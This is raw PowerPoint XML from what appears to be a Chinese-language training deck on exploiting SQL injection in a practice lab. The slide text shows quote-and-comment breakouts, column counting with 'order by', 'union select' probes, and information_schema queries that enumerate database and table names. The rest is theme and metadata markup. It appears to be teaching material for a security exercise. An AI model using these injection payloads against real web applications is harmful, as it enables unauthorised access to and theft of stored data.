                </a:solidFill>
              </a:rPr>
              <a:t>1'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>' LIMIT 0,1";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$id="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1' #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="SELECT * FROM users WHERE id='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" u="sng" dirty="0"/>
              <a:t>' LIMIT 0,1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>";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$id="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1' order by 3 %23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="SELECT * FROM users WHERE id='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1' order by 3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%23</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" u="sng" dirty="0"/>
              <a:t>' LIMIT 0,1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>$id="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-1' union select 1,2,3 %23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="SELECT * FROM users WHERE id='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-1' union select 1,2,3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%23</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" u="sng" dirty="0"/>
              <a:t>' LIMIT 0,1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="20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706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1C1D-37D3-24CE-1123-0FE340D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注入实战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649A3-AB42-AFFF-41BE-A57008C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AC5AE1-3B7A-FA39-0634-B2FE3F933A02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669923" y="1336277"/>
            <a:ext cx="108505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查询库名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>id=-1' union select 1,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>database()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>,3 %23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查询表名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>id=-1' union select 1,2,table_name from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>information_schema.tables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table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>='security'--+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>id=-1' union select 1,2,table_name from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>information_schema.tables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table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>=database()%23</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>id=-1' union select 1,2,table_name from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>information_schema.tables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table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>=database() limit 0,1%23</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>id=-1' union select 1,2,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>group_concat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) from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>information_schema.tables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table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>=database()%23</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3478315394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University of Malaya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9844"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="E82209"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="FCC300"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="0B52A2"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="0D8ECC"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="ABDBDF"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="4472C4"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="BFBFBF"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="tdl3kz1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niversity of Malaya">
    <a:dk1>
      <a:srgbClr val="000000"/>
    </a:dk1>
    <a:lt1>
      <a:srgbClr val="FFFFFF"/>
    </a:lt1>
    <a:dk2>
      <a:srgbClr val="768395"/>
    </a:dk2>
    <a:lt2>
      <a:srgbClr val="F0F0F0"/>
    </a:lt2>
    <a:accent1>
      <a:srgbClr val="019844"/>
    </a:accent1>
    <a:accent2>
      <a:srgbClr val="E82209"/>
    </a:accent2>
    <a:accent3>
      <a:srgbClr val="FCC300"/>
    </a:accent3>
    <a:accent4>
      <a:srgbClr val="0B52A2"/>
    </a:accent4>
    <a:accent5>
      <a:srgbClr val="0D8ECC"/>
    </a:accent5>
    <a:accent6>
      <a:srgbClr val="ABDBD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885</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>93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Helvetica Neue</vt:lpstr>
      <vt:lpstr>等线</vt:lpstr>
      <vt:lpstr>方正正中黑简体</vt:lpstr>
      <vt:lpstr>黑体</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>webwppDefTheme</vt:lpstr>
      <vt:lpstr>主题5</vt:lpstr>
      <vt:lpstr>网络空间安全综合演练-SQL注入漏洞利用</vt:lpstr>
      <vt:lpstr>概念</vt:lpstr>
      <vt:lpstr>数据库结构</vt:lpstr>
      <vt:lpstr>MySQL语句</vt:lpstr>
      <vt:lpstr>必要知识</vt:lpstr>
      <vt:lpstr>靶场环境</vt:lpstr>
      <vt:lpstr>SQL注入实战</vt:lpstr>
      <vt:lpstr>SQL注入实战</vt:lpstr>
      <vt:lpstr>SQL注入实战</vt:lpstr>
      <vt:lpstr>SQL注入实战</vt:lpstr>
      <vt:lpstr>SQL注入分类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Hansen</dc:creator>
  <cp:lastModifiedBy>skate Xu</cp:lastModifiedBy>
  <cp:revision>253</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-11-19T00:54:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-06-11T11:49:16Z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2052-11.1.0.11365</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ICV">
    <vt:lpwstr>849FB04837374DD9AE516CC38C79AB77</vt:lpwstr>
  </property>
</Properties>
</file>